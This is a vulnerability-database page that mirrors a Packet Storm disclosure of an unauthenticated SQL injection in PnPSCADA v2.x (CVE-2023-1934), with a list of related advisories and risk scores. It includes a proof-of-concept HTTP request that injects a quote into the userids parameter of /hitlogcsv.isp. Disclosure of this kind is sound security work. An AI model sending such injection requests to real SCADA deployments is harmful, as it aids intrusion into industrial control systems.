PnPSCADA 2.x SQL Injection

🗓️ 24 May 2023 00:00:00Reported by Momen EldawakhlyType

packetstorm🔗 packetstormsecurity.com👁 338 Views

PnPSCADA v2.x Unauthenticated PostgreSQL Injection CVE-2023-193

Reporter	Title	Published	Views	Family All 12
0day.today	PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Vulnerability	23 May 202300:00	–	zdt
Circl	CVE-2023-1934	12 May 202318:27	–	circl
CNNVD	SDG Technologies PnPSCADA SQL注入漏洞	12 May 202300:00	–	cnnvd
CVE	CVE-2023-1934	12 May 202313:18	–	cve
Cvelist	CVE-2023-1934	12 May 202313:18	–	cvelist
Exploit DB	PnPSCADA v2.x - Unauthenticated PostgreSQL Injection	23 May 202300:00	–	exploitdb
EUVD	EUVD-2023-24121	3 Oct 202520:07	–	euvd
ICS	SDG PnPSCADA	12 May 202318:09	–	ics
NVD	CVE-2023-1934	12 May 202314:15	–	nvd
Prion	Code injection	12 May 202314:15	–	prion

`# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection  
# Date: 15/5/2023  
# Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd  
# Vendor Homepage: https://pnpscada.com/  
# Version: PnPSCADA (cross platforms): v2.x  
# Tested on: Unix  
# CVE : CVE-2023-1934  
# Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8  
  
SQLi crashing point:  
  
GET /hitlogcsv.isp?userids=1337'&startdate=  
2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00  
HTTP/1.1  
Cache-Control: no-cache  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)  
AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0  
Safari/534.14  
Host: vulnerablepnpscada.int  
Accept: */*  
Accept-Encoding: gzip, deflate  
Connection: close  
  
`

24 May 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.17.5 - 9.8

EPSS0.00443

SSVC